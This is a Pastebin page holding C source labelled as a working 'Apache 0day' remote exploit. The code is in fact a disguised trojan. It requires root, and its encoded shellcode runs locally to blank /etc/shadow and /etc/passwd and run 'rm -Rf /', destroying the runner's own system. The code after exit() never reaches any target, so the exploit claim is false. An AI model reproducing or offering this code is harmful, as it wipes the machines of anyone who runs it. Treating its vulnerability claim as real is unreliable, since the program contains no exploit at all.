SHARE
TWEET

0day Apache Exploit

a guest Jun 17th, 2012 4,156 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. Exploit  : Apache 0day Exploit
  3. Author:  : okno
  4. Compile  : gcc  -W apache0.c -o apache0
  5. Usage:   : ./0apache HOST IP
  6. Thanks   : ergufo, stutm, mz, ascii
  7. */
  8.  
  9. #include <stdio.h>
  10. #include <netdb.h>
  11. #include <stdlib.h>
  12. #include <string.h>
  13. #include <unistd.h>
  14. #include <arpa/inet.h>
  15. #include <sys/types.h>
  16. #include <sys/socket.h>
  17. #include <netinet/in.h>
  18.  
  19. void usage(char *argv[])
  20. {
  21.   printf("Target : Apache 2.2.22 to Apache 2.4.2\n");
  22.   printf("Type   : 0day\n");
  23.   printf("Author : okno mail@pawelzorzan.eu\n");
  24.   printf("Web    : http://www.pawelzorzan.eu\n");
  25.   printf("Exec   : %s <serverapache> <porta>\n\n", argv[0]);
  26.   exit(1);
  27. }
  28.  
  29. unsigned char shellcode[] =
  30. "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  31. "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  32. "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  33. "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  34. "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  35. "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  36. "\xcd\x80";
  37.  
  38. int main(int argc, char *argv[])
  39. {
  40.   int uid = getuid();
  41.   int porta = 80, sock;
  42.   struct hostent *host;
  43.   struct sockaddr_in addr;
  44.  
  45.   if(uid !=0)
  46.   {
  47.     fprintf(stderr, "- Error - Need ROOT lamah!!\n");
  48.     exit(1);
  49.   }
  50.   if(uid == 0)
  51.   {
  52.     printf("\t+ OK Exploitting..\n");
  53.   }
  54.   if(argc != 3)
  55.        usage(argv);
  56.  
  57.   fprintf(stderr, "- FUCK\n");
  58.   (*(void(*)())shellcode)();
  59.   exit(1);
  60.   char payload[1024];
  61.   memcpy(payload, &shellcode, sizeof(shellcode));
  62.   if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  63.   {
  64.     printf("+ OK we are in... Se non capisci SIAMO DENTRO!\n");
  65.     system("/bin/sh");
  66.   }
  67.   else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  68.   {
  69.     fprintf(stderr, "- Failed! You suck & Your mother too!!\n");
  70.     exit(1);
  71.   }
  72. }
RAW Paste Data
Top